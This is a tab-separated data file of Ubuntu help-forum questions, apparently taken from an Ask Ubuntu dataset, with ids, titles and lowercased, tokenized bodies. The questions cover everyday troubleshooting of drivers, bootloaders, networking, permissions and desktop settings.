96187	unable to connect to internet using mobile broadband through samsung mobile sgh-e720/sgh-e840	i am trying to connect to internet using samsung corby mate in ubuntu 11.04 which shows using : $ lsusb bus 005 device 005 : id 04e8:663f samsung electronics co. , ltd sgh-e720/sgh-e840 bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the mobile broadband creates a connection but doesnt connect to internet . mobile broadband fails to connect . somehow on internet i found scripts to connect to internet , but now only browser can access it , ubuntu software center does not recognize this connection and when try to install any software it doesnt display active internet connection . i am using two chatscript & connection in /etc/ppp/peers & /etc/ppp respectively .
96195	increase the `` words choice list '' froms 6 to 9 ?	i am using ibus-quick ime . the words choice show only 6 words st once instead of 9 in window . this make the typing experience differ a lot as people are used to the old word choice ( and this is not a good reason to change . ) is there any way to improve the `` words choice list '' froms 6 to 9 ?
96196	update .htaccess file to restrict some pages	my .htaccess file from my root web server is : rewriteengine on rewritebase / rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule ^ ( .* ) \ ? * $ index.php/ $ 1 [ l , qsa ] when i access www.mysite.com/images or /javascript , the directory layout is showed , and all my images and assets are displayed . my application entry script is index.php . how can i deny this access ? thanks .
96201	python script to check if current ip address is from dhcp or static	how to check if eth address is taken from dhcp or set manually ( static ) using python ?
96202	run wubi ubuntu on virtualbox	i have installed and using ubuntu with wubi installer inside windows7 as a dual partition . now i want the same os image to be loaded using the virtualbox . is this possible ?
96204	how to make suspend work on an asus eeepc 1015b ( amd c-50 ) ?	i have a brand new asus eeepc 1015b ( amd c-50 apu ) netbook on which i have installed ubuntu 11.10 but when i close the lid or select `` suspend '' from the power menu or press the power button it wo n't resume from suspend mode ... it will actually suspend ok - just wo n't resume ... anyone else using the same laptop with ubuntu 11.10 ?
96212	how can i make pbuilder use my apt-cacher-ng instance ?	i have a apt-cacher-ng server on my lan network , and i was wondering how i could `` force '' pbuilder to use it ( to speed up package builds ) . typical setup client-side of the cache goes something like this : in /etc/apt/apt.conf : acquire : :http { proxy `` http : //servername:3142 '' ; } ;
96213	antivirus for ubuntu desktop and server 11.10	friends : what is the best antivirus for ubuntu server and desktop , and where i can find this . many thanks . fernando .
96216	right-click on xubuntu home screen is slow , is it normal ?	when i right-click on desktop or home screen of xubuntu , i see considerable delay before the menu appears . is it normal ? can this be tweaked to bring down the delay like that of other ubuntu distros or for that matter to ubuntu 's right-click .
96220	installation stuck at welcome screen	i decided to switch from windows to ubuntu . i downloaded ubuntu 11.10 , installed it onto a live usb-stick and restarted my computer . i ran ubuntu from the stick , and clicked on the install button ubuntu application . after completing the installation steps ( set language , time , keyboard e.t.c ) , i get the the welcome to ubuntu 11.10 screen and the cursor shows that it 's loading something but nothing else is going on . there 's no progress bar or anything . what 's going on ?
96222	sync folder contents into ubuntu one	how can i sync folder contents into ubuntu one without manually copying/pasting it ? let 's say i want to sync my /var/www into the ubuntu one , how can i do that ? is there a folder mirroring app for ubuntu 11.10 ? thanks !
96224	a window appears and then disappears when clicking the `` authorize '' button	this is my first time using gwibber , so i 'm a little bit confused . i start it and try to add a new account for facebook , but when i click the `` authorise '' button , a window appears and disappears again . what is wrong ? it 's shown up every time i tried this and it 's driving me crazy . btw , i use ubuntu 11.10 .
96228	is there any way to update the unity in ubuntu 11.04 ?	is there any way to update the unity ( dash , launcher , etc . ) in ubuntu 11.04 ? for example could i make it what ubuntu 11.10 has ? ( the dash contains icons for applications , places , etc at the bottom ) . if this is possible , please say how i can do it.. thanks in advance ! edit as many of you have asked/suggested to upgrade to 11.10 , i can not do this currently as my 3g modem does not work with ubuntu 11.10 ( i tested this on 2 computers with the same result ) and this modem is my only means to connect to the internet . so i guess i have to wait until 12.04 comes out.. : (
96229	auto mounting vmware virtual disk on ubuntu startup	how do i mount a vmware vmdk file as /home on startup ? i have been using ubuntu as a vmware guest . all my data resides on a single vmdk disk , which i mounted as /home in the vm using fstab . now i want to move to an actual ubuntu installtion for performance reasons ( installed with wubi under windows 7 ) . i can mount my vmdk to a folder using vmware-mount ( i have vmware server ) , but how do i go about mounting it to /home on startup ?
96230	my nokia s40 phone is not recognised as modem to connect to internet	what should i do in order to connect to internet using my nokia x2-01 mobile ?
96232	add /dev/sda8 to bootloader	i 've set up another ubuntu on my computer . so when i start-up my computer i can select from windows 7 or ubuntu 11.10 . but i 've installed ubuntu 11.10 two times and i ca n't start the one which is on /dev/sda8 so how can i add my second ubuntu 11.10 to the bootloader ?
96236	install ubuntu dual boot with windows 7 in a jbod array	some weeks ago i decided to try ubuntu on a virtual machine , and i really like it ! then , some days ago , i tried to install it on my computer , together with windows 7 . but , now , i have a problem . my computer have 2 hd 's ( 1tb and 500gb ) in a jbod array , and then , 2 partitions : 50gb for windows 7 , and the rest to my files . i 've created another 30gb partition to install ubuntu , from the free space on my 2째 partition , but , since i 'm really new to ubuntu and linux , i really do n't know what to do . ubuntu does n't recognize the raid , and i already checked this , but , since it 's a little old , and i ca n't loose my files , did n't helped too much , i think . some details : the jbod is configured on the motherboard controller , and windows is installed just with a special driver , with no programs at all . raid controller vendor is amd . this kind of question probably are asked frequently , sorry for that , but i am really new to ubuntu . also , sorry for my poor english , it is n't my native language . thanks in advance for your assistance .
96237	where can i find gnome-classic themes ?	does anybody know where can i find themes for gnome 3 fallback mode ? i mean this session of gnome 3 : can anybody help me with this one , because i ca n't find any solutions.pleaseeeeee !
96240	unable to log in to user with encrypted home directory	i made some changes to ~/.pam_environment but i made a mistake . there 's a problem with the file syntax now and i ca n't log in . my home directory is encrypted and i do n't have a backup user account to use . i 've done some research on mounting it from a live cd , but it seems to be read only . is there a way to force it to skip that file or to mount the file system in read/write mode ?
96250	streaming in justin.tv using ubuntu 11.10	i used to streaming videos in justin.tv..using windows 7 and i had no problems . but a month ago , i installed ubuntu 11.10 ( 32 bits ) in my notebook and now i ca n't streaming videos . the problem is that when i click on the button `` go live ! `` , itâ´s supposed that the screen where i have to clic on `` allow '' it should appear , but it does n't . the web only displays the message : `` you ca n't start until you click allow below . `` , but the `` allow button '' does n't appear , instead of that i only see a black screen . i guessed that it was a problem with the adobe flash player , but i have the lastest version for linux installed and i have no problems with youtube . also , my webcam works without problem in others ubuntu 's applications . i hope you can help me . this are my notebook 's features : toshiba satellite c645-sp4135l / 3gb ram / intel core i3-2310m 2.10ghz x 4 / hhd:320gb thanks ! ! orlando
96252	equivalent of yum distro-sync ?	in redhat-based distros , the yum tool has a distro-sync command which will synchronize packages to the current repositories . this command is useful for returning to a base state if base packages have been modified from an outside source . the docs for the command is : distribution-synchronization or distro-sync synchronizes the installed package set with the latest packages available , this is done by either obsoleting , upgrading or downgrading as appropriate . this will `` normally '' do the same thing as the upgrade command however if you have the package foo installed at version 4 , and the latest available is only version 3 , then this command will downgrade foo to version 3 . is there an equivalent operation in ubuntu ?
96253	how to disable the touchpad on a dell inspiron 5040	i have a dell inspiron 5040 , and i can not disable the touchpad . the best solution would be if ubuntu could actually not ignore the keyboard shortcut that disables it .
96254	sharing sub-folders as well	i am new to ubuntu , i have ubuntu 10.04 and want to share the video\music files with my xtremer . i was using this guide ( link ) but i want also to share the sub folders . now i can see all the folders but not there contents , how can i share the folder with all is sub folders and there contents ? thanks ,
96258	cant install ati driver	hi i cant install any of the two ati drivers ( ubuntu 11.10 ) . when i try i get the following error message : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log any help here ?
96265	grub 1.98 : `` error : no argument specified ''	recently , i updated ubuntu 10.04 server lts . the server reports itself as distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.3 lts '' there are multiple machines here with the same install and hardware , and all work fine except for one . this one has problems during the boot process : when grub loads , it stops at the main menu and waits for keyboard input . after pressing a key , grub reports error : no argument specified and continues ( either with or without keypress ) . network does n't come up : eth0 and eth1 are redefined as eth4 and eth5 , and eth5 does n't come up . ifup eth5 works fine at the command line . i 'm still working on the last - but i suspect the first two are part of the same problem . checking differences between a working /boot/grub/grub.cfg and this one do n't turn up signifcant differences : only ( previous ) kernel versions and root uuids . a significant difference between this and other similar ( working ) systems in our data center is that this system is a dell r710 ; others are dell 2950s . we 've working r710s all over that are running ubuntu server 10.04 but none updated as currently as this one . this problem has just recently surfaced ; i 've updated and rebooted three systems including this one in the last 48 hours . only this one had problems - but only this one stopped at the grub menu . the others all come back automatically - so did i just miss seeing this error perhaps ? grub is version 1.98 : | status=not/inst/cfg-files/unpacked/failed-cfg/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===============================-=================================-============================================ ii grub-common 1.98-1ubuntu12 grand unified bootloader , version 2 ( common ii grub-pc 1.98-1ubuntu12 grand unified bootloader , version 2 ( pc/bios i found this thread on the ubuntu forums but it seems to be related to natty ( 11.10 ) . some reports suggested this bug showed up in an upgrade from lucid ( 10.04 ) to maverick ( 11.04 ) or from maverick to natty ; i 'm only running lucid lts . this thread is also related to grub 1.99 and this version is 1.98 . the thread suggests that the line search -- no-floppy -- fs-uuid -- set 857d5af9-23cd-4d9b-908b-cc075e866758 should instead be search -- no-floppy -- fs-uuid -- set=root 857d5af9-23cd-4d9b-908b-cc075e866758 can someone help resolve this issue ? am i just seeing this error here because grub stops at the menu ? why would grub stop at the menu on one system and not others ? update : while the actual version is 1.98 the real version of grub is grub 2 ; this also holds for version 1.99 . the more i think about this , the more convinced i am that other systems are probably reporting the same error but continuing on ; the real problem here ( with grub anyway ) is the fact that the system stops at the menu . i ca n't test the other systems for comparison as they are back in use already . update : i rebooted the machine again . the message first shows up ( in bold ) before the menu appears . after selecting the appropriate option , it shows up ( on a clean screen ) as described above with a press any key to continue ... message . after about 5 seconds , the screen clears again and booting continues ( minus networking ) . the grub2 installation reports itself as version 1.99~rc1-13ubuntu3 which i think is different from what the package reports . i 'm not sure if this is just the way it is or if things have been changed . update : more on the two versions of grub2 mentioned . the first is the installed package which is 1.98-1ubuntu12 ; the second is the version reported at the grub2 menu which is 1.99~rc1-13ubuntu3 . according to the changelog for the grub2 package , version 1.99~rc1-13ubuntu3 was introduced on april 21 , 2011 , in natty ( note , not lucid ) and version 1.98-1ubuntu12 was introduced june 17 , 2011 , in lucid updates . this system has never had ubuntu natty or oneric on it ; it did however , have red hat enterprise linux 5 on it . however , the version of grub used by rhel 5 ( at time of writing ) is 0.97-13.5 which is grub legacy . so where did version 1.99~rc1-13ubuntu3 come from ? i strongly suspect that this is the source of my problems , and a complete reinstall of grub2 to the mbr would fix my problems . however , i 've had to return the system to full operation ; thus , testing will have to wait .
96269	how can i set the audio profiles to allow both input or output to work at once on a thinkpad t400 ?	my speakers work correctly when the audio profile in the system sound settings dialog is set to `` analog stereo output '' . the internal microphone works when the profile is set to digital stereo ( iec958 ) output + analog stereo input , however the speakers then stop working . the other available profiles are no better . i believe this started when i updated to 11.10 . i 've tried adjusting settings with pavucontrol without any luck . the hardware in the thinkpad t400 is : 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) subsystem : lenovo device 20f2 flags : bus master , fast devsel , latency 0 , irq 17 memory at fc020000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : hda intel kernel modules : snd-hda-intel how can i create or obtain a profile where the input and output both work simultaneously ?
96270	how do i connect/share between my two computers at home and my printer ?	i have a desktop with ubuntu 11.10 ( 32 bit ) with a brother mfc printer/scanner connected to it , the desktop is connected to the internet via lan line . i also have a netbook that is used in the living room and the most , it is 11.10 ( 32 bit ) . the netbook connects to the internet via wifi . how ( can ? ) do i set it up so i can print to the printer with the netbook , without having to connect it to the printer in the other room or using google cloud printer ? thank you for your time and answers .
96271	why no easy way to install new themes in gnome 3 and unity ?	why there is no easy way to install new themes in ubuntu 11.10 and 12.04 in both unity and gnome 3 ?
96274	uninstall ubuntu tv	i was testing and installed ubuntu tv via instructions which can be found here . https : //wiki.ubuntu.com/ubuntutv/contributing but how do i remove it ? make uninstall does n't work and i am stuck . it is not my productivity machine , but would be nice to know for learning
96278	ca n't run google earth with ironhide - libgl.so.1 wrong elf class	i 've got a working ironhide setup ( ubuntu 11.10 ) . most applications works fine with the nvidia-drivers ( nvidia-current ) , but i ca n't get google earth ( 64bit .deb installed ) working with or without optirun . anyone know how to fix this ? error : ld.so : object 'librrfaker.so ' from ld_preload can not be preloaded : ignored . ./googleearth-bin : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64
96280	can ubuntu ( or server ) run a 64 core ( 4x16 ) server ( one motherboard ) ?	we 've been doing graphics rendering using maxwell render on a ubuntu box with a 6 core amd phenom ii processor . ubuntu handles all 6 cores brilliantly , but a 4 core laptop is almost as fast . we 'd like to upgrade and create a 64 core rackmount using : 1x tyan s8812 motherboard ( four processor sockets ) 4x amd opteron 6200 ( interlagos ) 16 core processors can anyone confirm or deny ( with documentation , not opinion ) whether ubuntu ( or ubuntu server ) out of the box will recognize and handle all 64 cores ? ( e.g . is there an upper limit to how many cores ubuntu can handle out-of-the-box ? )
96285	nvidia driver 290.10 or 173 from additional drivers package ?	i use ubuntu 11.10 . if i installed the last driver from the nvidia website do i still need the additional driver module ? i use nvidia version 290.10 when i look at the nvidia x-server but when i look at the additional driver module it gives driver 173 in use . i have a geforce 6200 . i am confused by this . should i delete a package ?
96297	dual boot windows 7 with ubuntu on second hard disk	system has two hard disks : 160gb ssd , which is the boot disk and 500gb raid1 hdd . i have windows 7 ultimate 64-bit installed as the main os on the ssd . i do n't want to touch or modify this drive . the 500gb raid1 drive had one partition : 1 primary ntfs partition for storage of stuff i want to access from windows , and then about 200gb of unallocated space . i ran the 11.10 installer , selected the `` just install the stuff '' option ( the first one , i forget what it 's called ) , and it installed it in the unallocated space , creating two primary partitions : one ~200gb ext4 partition for ubuntu itself and another 12gb primary partition for the swap file ( same size as ram i have ) . problem is that grub did n't install to the mbr on the boot disk ( the ssd ) so i have no way of starting ubuntu that does n't involve bios shenanigans . i am kind of apprehensive about manually installing grub into the mbr of the boot disk myself so any guidance regarding if that 's even what i need to do would be great . fyi , i tried re-installing specifying everything manually , including setting the ~200gb ext4 partition to be the / mount point and telling the installer to install the bootloader on /dev/sda1 ( i think , perhaps is was /dev/sda , i forget , exactly ) , and that did n't work , either .
96298	how to activate kerning in libreoffice ?	my fonts are horribly unkerned in libreoffice . example : here 's a comparison , libreoffice on top and inkscape below . as you can see , libreoffice messes up the kerning . the font is ubuntu , 10pt in libreoffice and ubuntu , 13px in inkscape . the kerning problem gets less if i increase the font-size btw . is there a switch for activating the kerning in libreoffice or is this a known problem ?
96300	xinet tftp timeout	i trying to set up a pxe boot server . everything is working but the tftp client is timing out . tftp connection timeout i am using this to setup the tftp server . http : //www.davidsudjiman.info/2006/03/27/installing-and-setting-tftpd-in-ubuntu/ /etc/xinet.d/tftp service tftp { protocol = udp port = 69 socket_type = dgram wait = yes user = nobody server = /usr/sbin/in.tftpd server_args = /tftpboot disable = no } ps ax|grep tftp does n't return it running . any idea 's what could be wrong ?
96303	laptop wo n't boot and ca n't see partition	i am running ubuntu 10.10. on an acer aspire laptop alongside windows 7 . i left my laptop on the battery which clearly ran out- and now neither windows nor ubuntu will load ( i am currently running ubuntu off a usb stick ) . on the usb stick i can see the windows partition and access the files , but i ca n't even see the ubuntu partition- i do n't think it is mounted . in the device manager i have no option to mount it , i can format it but when i try , nothing happens .
96306	how can i get php scripts to run locally in a browser ?	i 'd like to use php includes to streamline the process of making a few web pages . the problem with that , however , is that i ca n't seem to test them locally . they work fine on the server , but my computer does n't seem to understand them . i tried installing php and apache but it did n't seem to work . what do i need to do to set up a php testing server locally ?
96310	dash application search unresponsive at startup	i 'm running ubuntu 11.10 . when i attempt to use the dash to search for an application immediately after log in , the search is unresponsive . i have to open and close the dash several times and attempt several application searches before it returns results for my search . this behaviour happens whether i open the dash with the mouse or the windows key . although the application search is unresponsive , the file- and music-search functions work just fine . i 've noticed that the application icon at the bottom of the dash window is missing until the application search becomes responsive , at which point the icon reappears . if i load an application from the dock ( with either my mouse or with the a windows-key and number combination ) first , the application search in the dash works fine . i 've done some looking but have n't seen the same problem discussed elsewhere . some people complaining of dash search issues have reinstalled certain packages , but missing packages do n't seem to be the issue here . the search functionality returns after several attempts to use it . any help would be greatly appreciated .
96313	is linux really malware safe ? or people just do n't bother creating them for linux ?	i 've never used linux before and i heard that you do n't need to worry about malware on linux . so , as the title said , is linux really malware safe ? or do people just not bother creating them for linux because linux is not popular for standard end-users ?
96317	how do i get the battery indicator to indicate total remaining power if i have 2 batteries ?	i 'm having a little bit of trouble with my battery indicator . i 'm using a laptop that has 2 batteries ( one standard and one bay battery ) . they are both recognized and used fine by ubuntu , however i have one problem . the indicator shows both batteries , but only ever gives me info for the main battery . for instance , the entire time i am draining the bay battery , my indicator shows ( 100 % ) because it is only telling me about the main battery . if i go to power settings , i can see a combined time : is there any way in 11.10 to have the indicator show me the total estimated remaining time ? also , if the bay battery runs out and starts using the main battery and then i put the laptop into suspend , when it comes out of suspend , it will give me a low battery warning and then re-suspend itself . this can be alleviated by restarting , but is quite annoying . any ideas for this ? thanks for any help you all might have !
96322	what is the most quiet way i can keep my laptop running ?	i have my laptop as a server for my website and during the following 48 hours i want it to be online non-stop ! i want to know how i can keep it as quiet as possible , and i also want to eliminate any light there might be from the screen . i 'm a student and i sleep in the same room . how can i keep it as quiet as possible ? how can i eliminate any light from the screen ?
96324	how can i install openjdk 7 on 10.04 lts ?	i noticed it 's available on 11.10 , but is there a backport to lucid 10.04 lts ?
96330	help with install epiphany 3.3.4	when i compile from source , it gives me this after the `` ./configure '' command . i 've already installed the `` glib-2.0.0 '' that it initially told me it dependent on .
96331	can not theme windows in advanced settings in gnome 3.2	i am running gnome 3.2.1 and am trying to configure my themes under the advanced settings menu . all of the options , ( shell theme , cursor , icon , gtk ) work correcly and are themed accept for the window theme section . no matter what i choose , nothing changes and my window ui is simply a dark grey box with a white x on the top right . any suggestions ?
96333	what wireless driver am i using ?	im trying to find the most suitable driver for my network usb device in ubuntu 11.10 . first , where can i check the driver that ubuntu is using to control this device ? it appears as interface wireless ( wlan1 ) in network tools , but apart from the mac address and some statistics about data transmission , there 's no info about the driver . i 'd already installed aircrack-ng , which provides several options to scan networks . running airmon-ng start wlan1in terminal i get the following : interface chipset driver eth1 unknown wl wlan1 unknown rt2800usb - [ phy2 ] ( monitor mode enabled on mon0 ) the wireless adapter is tp-link model tl-wn7200nd , and the wireless panel reads it as a ralink adapter . seems that rt2800usb is the driver for the adapter , but is there anything more powerful for this device ? ?
96339	why does n't changing a variable in a script alter it outside the script ?	let 's say i export a variable with the terminal . after that i call a script that alters that variable to something else . but when i return to the terminal and echo the variable , it remains as its original value . what can i do if i want like the variable to be changed and visible outside the script , not only there in the script . here 's an example of what i want to say : ares @ ares-hp-probook-4530s : ~ $ export package=tree ares @ ares-hp-probook-4530s : ~ $ cat script3.sh # ! /bin/bash # set -x echo $ package apt-cache show $ 1 | head -1 if [ $ ? -eq 0 ] ; then package=1 else package=0 fi echo $ package output when running script ares @ ares-hp-probook-4530s : ~ $ ./script3.sh gnome-terminal tree package : gnome-terminal 1 ares @ ares-hp-probook-4530s : ~ $ echo $ package tree ares @ ares-hp-probook-4530s : ~ $
96341	synchronizing error . can not access to data	i have a problem with my ubuntu one account . when i try to connect from my desktop , i 'm said that there has been a file synchronization mistake ( in french : erreur de synchronisation des fichiers ) , and that the value can not have been got back ( la valeur n'a pas pu être récupérée ) . i can not acess to my files from it , but it is possible via internet . it is written : erreur de synchronisation des fichiers . ( org.freedesktop.dbus.error.unknownmethod : method `` current_status '' with signature `` '' on interface `` com.ubuntuone.syncdaemon.status '' does n't exist . do you have some advices ? thanks
96343	internet unusably slow with realtek semiconductor co. , ltd. rtl8111/8168b card	so i have recently installed ubuntu 11.10 for a dual boot with wind 7 . after the install i had like 300 updates , so i installed them . at first i could use the internet , although it was extremely slow . however now i can not , sometimes it will load and others it will simply time out . when i try to download something it will either take forever or will not at all . this is a wired system . on windows side my speeds are fine . any help would be greatly appreciated . also like i said i am new to linux/ubuntu so please be nice . one last thing , i also installed 11.10 for same dual boot on my laptop , and wireless speed is the same as on windows ? only the wired desktop gives me the problem ? hear is some hardware info.. hope it helps . mobo : gigabyte ga=880gma- amd / cpu : amd phenom ( tm ) iix4 965 / 16 gb ram / realtek pcie gbe family controller / cisco linksys e2000 / ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) / eth0 link encap : ethernet hwaddr 50 : e5:49:33:64 : cf inet addr:192.168.1.118 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :52e5:49ff : fe33:64cf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:76722 errors:0 dropped:76722 overruns:0 frame:76722 tx packets:49692 errors:0 dropped:65 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:107956638 ( 107.9 mb ) tx bytes:4342553 ( 4.3 mb ) interrupt:44 base address:0x2000 thanks to roadmr problem solved ! i powered down pc , un plugged power from pc end , waited a few ( maybe 3 ) minutes . plugged power back in , pushed and held power button for 30 + seconds . let go , powered on pc , and my internet is fine ! downloads and web speed blaze , just like on my win 7 boot , maybe even faster . problem solved , thanks to all ! ! **
96345	permisions set to unknown after chmod 777	i just noticed that after running chmod 777 * on a directory that has sub-directories in it does what you would expect . it sets the permissions of everything , including the sub-directories to 777 . however , if you then decided that you did n't want to do that , and run chmod 644 * now the contents of the sub-directories get set unknown permissions and you can not change them back . why does that happen ? is this the expected behavior , or a bug ? is there a way to restore the file permissions ? since the files i had were in a zip file in another location , i just deleted the entire directory , and unzipped the zip file again , but i would like to know the causes of this `` problem '' , and it 's remedies . some additional info , i am running those command on a remote machine over ssh .
96350	can not access resources on vpn network	i managed to connect from outside to the corporate network using vpn ( openvpn plugin of the network-manager ) . i get my ip address , routing tables etc set up . but i can not access anything on that network . i set my computer as dmz so it 's not a nat issue . my lan uses 192.168.123.xxx . vpn uses 10.xxx.xxx.xxx address space . i opened wireshark and listened to the tun0 device . packets going out , but nothing received . i also listened to the eth0 device . packets are going in from and out to the vpn gateway . i set up iptables to accept all traffic via the tun devices , but no avail . any ideas to make vpn work ?
96355	what can i do to diagnose my thinkpad r60 locking up when connecting power adaptor ?	i move my laptop between places in my flat quite a bit for this i 've got multiple power adaptors connected to outlets in two rooms . now every now and again ( i ca n't see a pattern ) when i move the laptop between the two rooms with the adaptors or if i have been using the computer for a while on battery when i connect the power cable ubuntu locks up ( typically sound gets stuck in a 1-2 loop , no key or mouse response ) . the only thing i can do in this situation is force a shutdown by holding the power button . since i do n't know enough about how the logs work to figure out if a hard reset kills all important information or where i could find any clues to why the laptop locks up when reconnecting power . is there a way for me to find out what happened in the moment of switching to ac power that causes the system to freeze ?
96357	what would be the best video driver to use on my dell vostro 1000 running ubuntu 11.10	i recently re installed oneric on my dell vostro 1000 . i got the wireless working ( which was n't a big deal ) and now i am working on the video config . the video card is an ati x1150 right now it seems to be using the gallium 3d driver version 0.3 i think and its working pretty well but i have noticed some sluggishness in the video . i was looking through some other posts about the possibility of using fglrx on this system . jockey not detecting my ati igp xpress 1150 is it possible to install older catalyst versions through jockey ? but it seems that its either not possible or not recommended so my question is this . would it be worth my time to try to install say catalyst 9.2 ( i believe this is the last version to officially support my card ) or should i stick with gallium ? if i should stick with the gallium then is there anywhere i can get an update to it that will ( hopefully ) fix some of the lag ? would the x update or xorg edgers ppa have the update ? thank you for taking the time to try and help .
96358	how can i increase laptop lcd luminosity steps ?	i was wondering if there 's a way to tweak the steps that the luminosity of my lcd do when adjusting it from keyboard . it seems that they are just +/-30 % of total , and that 's pretty annoying , because sometimes it would be useful to have more control on it . as an example now : 0 is too low , but 30 % is too high . i can reach 10 % by letting it 100 % and then down 30 by 30 until 10 , but it 's still too low . i 'd like to have a more fine control on it , like the 18 steps of the sound . i 'm on an acer extensa 5620 , here 's my lshw : $ sudo lshw -short -sanitize h/w path device class description ========================================================== system notebook /0 bus columbia /0/0 memory 105kib bios /0/4 processor intel ( r ) core ( tm ) 2 duo cpu t5550 @ 1.83ghz /0/4/5 memory 64kib l1 cache /0/4/6 memory 2mib l2 cache /0/4/1.1 processor logical cpu /0/4/1.2 processor logical cpu /0/10 memory 3gib system memory /0/10/0 memory 1gib sodimm ddr2 synchronous 667 mhz ( 1,5 ns ) /0/10/1 memory 2gib sodimm ddr2 synchronous 667 mhz ( 1,5 ns ) /0/1 processor /0/1/1.1 processor logical cpu /0/1/1.2 processor logical cpu /0/100 bridge mobile pm965/gm965/gl960 memory controller hub /0/100/2 display mobile gm965/gl960 integrated graphics controller ( primary ) /0/100/2.1 display mobile gm965/gl960 integrated graphics controller ( secondary ) /0/100/1a bus 82801h ( ich8 family ) usb uhci controller # 4 /0/100/1a.1 bus 82801h ( ich8 family ) usb uhci controller # 5 /0/100/1a.7 bus 82801h ( ich8 family ) usb2 ehci controller # 2 /0/100/1b multimedia 82801h ( ich8 family ) hd audio controller /0/100/1c bridge 82801h ( ich8 family ) pci express port 1 /0/100/1c/0 eth0 network netlink bcm5787m gigabit ethernet pci express /0/100/1c.1 bridge 82801h ( ich8 family ) pci express port 2 /0/100/1c.1/0 wlan0 network pro/wireless 3945abg [ golan ] network connection /0/100/1c.2 bridge 82801h ( ich8 family ) pci express port 3 /0/100/1d bus 82801h ( ich8 family ) usb uhci controller # 1 /0/100/1d.1 bus 82801h ( ich8 family ) usb uhci controller # 2 /0/100/1d.2 bus 82801h ( ich8 family ) usb uhci controller # 3 /0/100/1d.7 bus 82801h ( ich8 family ) usb2 ehci controller # 1 /0/100/1e bridge 82801 mobile pci bridge /0/100/1e/6 bridge pcixx12 cardbus controller /0/100/1e/6.1 bus pcixx12 ohci compliant ieee 1394 host controller /0/100/1e/6.2 storage 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) /0/100/1e/6.3 generic pcixx12 sda standard compliant sd host controller /0/100/1f bridge 82801hem ( ich8m ) lpc interface controller /0/100/1f.1 scsi0 storage 82801hbm/hem ( ich8m/ich8m-e ) ide controller /0/100/1f.1/0.0.0 /dev/cdrom disk dvdram gsa-t40n /0/100/1f.2 scsi2 storage 82801hbm/hem ( ich8m/ich8m-e ) sata ide controller /0/100/1f.2/0.0.0 /dev/sda disk 250gb hitachi hts54252 /0/100/1f.2/0.0.0/1 /dev/sda1 volume 26gib windows ntfs volume /0/100/1f.2/0.0.0/2 /dev/sda2 volume 17gib extended partition /0/100/1f.2/0.0.0/2/5 /dev/sda5 volume 3200mib linux swap / solaris partition /0/100/1f.2/0.0.0/2/6 /dev/sda6 volume 14gib linux filesystem partition /0/100/1f.2/0.0.0/3 /dev/sda3 volume 189gib ext3 volume /0/100/1f.3 bus 82801h ( ich8 family ) smbus controller /0/2 scsi12 storage /0/2/0.0.0 /dev/sdb disk scsi disk any tip ? many thanks in advance !
96362	want to find out how to install lastest chromium build	i want to know how to install the latest chromium build on my computer , i 've checked the ppa and it only goes up to 18.0.997.0 whilst the newest version is chromium 18.0.1011.0
96367	how can i get line-in microphone working with skype ?	i 've got a clean lubuntu 11.10 install . in the days that i 've used microsoft windows , i 've used an external microphone for calling with skype . the microphone was plug-and-play , and no drivers were needed . right now , i 'm using skype on lubuntu . i 've installed pulseaudio , because it comes by default in ubuntu , and it seemed wise to do so therefore . whenever i make a test call , i wo n't get any input : it seems like the microphone does n't record anything . so , my question is : how can i get an external ( line-in ) microphone to work in lubuntu ?
96374	way to logout/restart to another operating system	in some computers that also have windows xp or windows 7 i normally reboot the pc and from the grub menu select windows if i want to boot to it or just leave it alone to start with ubuntu . i am trying to find a way to , for example , when telling ubuntu to restart it gives me a choice to restart with another operating system without having to be there when the grub menu appears . like a temporary option that boots to windows , mac or another linux distro for that time . something like a `` quick os switcher '' . is this possible ?
96375	why are my file selection dialogs so big ? how do i make them smaller ?	when i use an external monitor , my file selection dialog boxes seem to be huge -- wider than my larger screen . i assume it is a nautilus issue since it happens whether i 'm trying to open a file to upload ( in firefox ) or attach ( in thunderbird ) or just open it in libreoffice . see screenshot : the browser window fills my left-hand monitor , the `` open '' dialog is wider than one screen , and wider than the window that spawned it . it 's huge . it did n't used to be huge . is there some way to force dialog windows to be smaller by default ? whenever i try to open/attach/upload a file i have to re-size the finder dialog before i can see what i 'm looking at . i do n't understand why it is defaulting to such a huge window .
96376	alternatives to libreoffice	what alternatives to libreoffice ( specially lo writer ) does ubuntu come with . i have seen abiword there but are there others ?
96379	what text editors are available for ubuntu	what text editors are available for ubuntu ? i would like text editors for all usages . programming writing hex editing
96382	ubuntu intallion gets hung up on ready when you are	i am doing a full system install . what do i need to do when i see the ready when you are ? because the installion goes no further . is it looking for some kind of input from me ? if so what ?
